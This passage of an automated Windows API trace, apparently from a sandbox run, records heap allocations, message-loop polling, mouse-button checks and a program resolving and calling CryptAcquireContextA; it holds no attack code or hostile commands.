lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.569] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.569] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20590 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xf33978 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf205e0 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7d0 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33948 [0274.570] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33948 | out: hHeap=0xcc0000) returned 1 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xed91f0 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20608 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb6f8 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33948 [0274.570] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6f8 | out: hHeap=0xcc0000) returned 1 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20630 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb6f8 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48f0 [0274.570] PeekMessageW (in: lpMsg=0x8df3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df3fc) returned 0 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.570] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb710 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91c0 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb6c8 [0274.570] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33938 [0274.571] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.571] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6c8 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91c0 | out: hHeap=0xcc0000) returned 1 [0274.571] PeekMessageW (in: lpMsg=0x8df3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df3fc) returned 0 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48f0 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6f8 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20630 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33948 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20608 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91f0 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33978 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20590 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7d0 | out: hHeap=0xcc0000) returned 1 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf205e0 | out: hHeap=0xcc0000) returned 1 [0274.571] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.571] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf205e0 [0274.571] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7d0 [0274.571] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33978 [0274.571] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7d0 | out: hHeap=0xcc0000) returned 1 [0274.572] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20590 [0274.572] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7d0 [0274.572] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91f0 [0274.572] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33948 [0274.572] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91f0 | out: hHeap=0xcc0000) returned 1 [0274.572] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33948 | out: hHeap=0xcc0000) returned 1 [0274.572] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.572] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20608 [0274.573] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91f0 [0274.573] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33948 [0274.573] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb6f8 [0274.573] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91c0 [0274.573] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.573] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91c0 | out: hHeap=0xcc0000) returned 1 [0274.573] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20630 [0274.573] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed91c0 [0274.574] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.574] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.574] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.574] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0274.574] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.574] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.574] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb6c8 [0274.574] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48f0 [0274.574] PeekMessageW (in: lpMsg=0x8df004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df004) returned 1 [0274.574] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8df004) returned 0 [0274.574] TranslateMessage (lpMsg=0x8df004) returned 0 [0274.574] DispatchMessageW (lpMsg=0x8df004) returned 0x0 [0274.574] GetForegroundWindow () returned 0xc0170 [0274.574] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.574] GetCursorPos (in: lpPoint=0x8dee40 | out: lpPoint=0x8dee40*(x=881, y=501)) returned 1 [0274.574] ScreenToClient (in: hWnd=0xc0170, lpPoint=0x8dee40 | out: lpPoint=0x8dee40) returned 1 [0274.574] GetAsyncKeyState (vKey=1) returned 0 [0274.574] GetAsyncKeyState (vKey=2) returned 0 [0274.574] PeekMessageW (in: lpMsg=0x8df004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df004) returned 0 [0274.574] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33918 [0274.574] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33908 [0274.575] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33908 | out: hHeap=0xcc0000) returned 1 [0274.575] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.575] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48f0 | out: hHeap=0xcc0000) returned 1 [0274.575] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6c8 | out: hHeap=0xcc0000) returned 1 [0274.575] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb6c8 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb6e0 [0274.575] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9190 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb698 [0274.575] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb6b0 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9160 [0274.575] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb668 [0274.575] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.576] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.576] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb680 [0274.576] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.576] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9130 [0274.576] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.576] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb638 [0274.576] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.576] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.576] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb650 [0274.576] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.576] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9100 [0274.577] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48f0 [0274.577] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20630 | out: hHeap=0xcc0000) returned 1 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb608 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.577] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb620 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed90d0 [0274.577] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5d8 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.577] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5f0 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed90a0 [0274.577] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5a8 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33928 [0274.577] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33928 | out: hHeap=0xcc0000) returned 1 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33928 [0274.577] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5c0 [0274.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0274.578] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.578] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.578] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33908 [0274.578] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb578 [0274.578] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.578] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.578] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb578 | out: hHeap=0xcc0000) returned 1 [0274.579] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33908 | out: hHeap=0xcc0000) returned 1 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20630 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33908 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb578 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338f8 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.579] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb578 | out: hHeap=0xcc0000) returned 1 [0274.579] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.579] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.579] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338f8 | out: hHeap=0xcc0000) returned 1 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338f8 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338e8 [0274.579] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb578 [0274.579] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.579] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb578 | out: hHeap=0xcc0000) returned 1 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338e8 | out: hHeap=0xcc0000) returned 1 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338e8 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb578 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338d8 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb578 | out: hHeap=0xcc0000) returned 1 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338d8 | out: hHeap=0xcc0000) returned 1 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338d8 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338c8 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb578 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb578 | out: hHeap=0xcc0000) returned 1 [0274.580] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338c8 | out: hHeap=0xcc0000) returned 1 [0274.580] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338c8 [0274.581] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb578 [0274.581] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.581] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338b8 [0274.581] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.581] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb578 | out: hHeap=0xcc0000) returned 1 [0274.581] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.581] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.581] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338b8 | out: hHeap=0xcc0000) returned 1 [0274.581] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.581] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338b8 [0274.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0274.581] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x14) returned 0xf23868 [0274.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0xf23868, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0274.581] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.581] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20658 [0274.581] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.582] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContext") returned 0x0 [0274.582] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20658 | out: hHeap=0xcc0000) returned 1 [0274.582] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338b8 | out: hHeap=0xcc0000) returned 1 [0274.582] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338b8 [0274.582] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.582] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.582] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0274.582] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x15) returned 0xf23868 [0274.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0xf23868, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0274.582] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.583] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20658 [0274.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.583] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContextA") returned 0x74f291dd [0274.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20658 | out: hHeap=0xcc0000) returned 1 [0274.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338b8 | out: hHeap=0xcc0000) returned 1 [0274.583] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20658 [0274.583] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338b8 [0274.583] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.583] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338a8 [0274.583] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33898 [0274.583] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33888 [0274.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338b8 | out: hHeap=0xcc0000) returned 1 [0274.583] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.584] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.584] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33898 | out: hHeap=0xcc0000) returned 1 [0274.584] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33888 | out: hHeap=0xcc0000) returned 1 [0274.584] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20658 | out: hHeap=0xcc0000) returned 1 [0274.584] CryptAcquireContextA (in: phProv=0x8defd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8defd8*=0xd27108) returned 1 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33898 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x214) returned 0xd07380 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23848 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9070 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb578 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb590 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338a8 [0274.587] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb590 | out: hHeap=0xcc0000) returned 1 [0274.587] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.587] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb578 | out: hHeap=0xcc0000) returned 1 [0274.587] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb578 [0274.587] RtlAllocateHeap 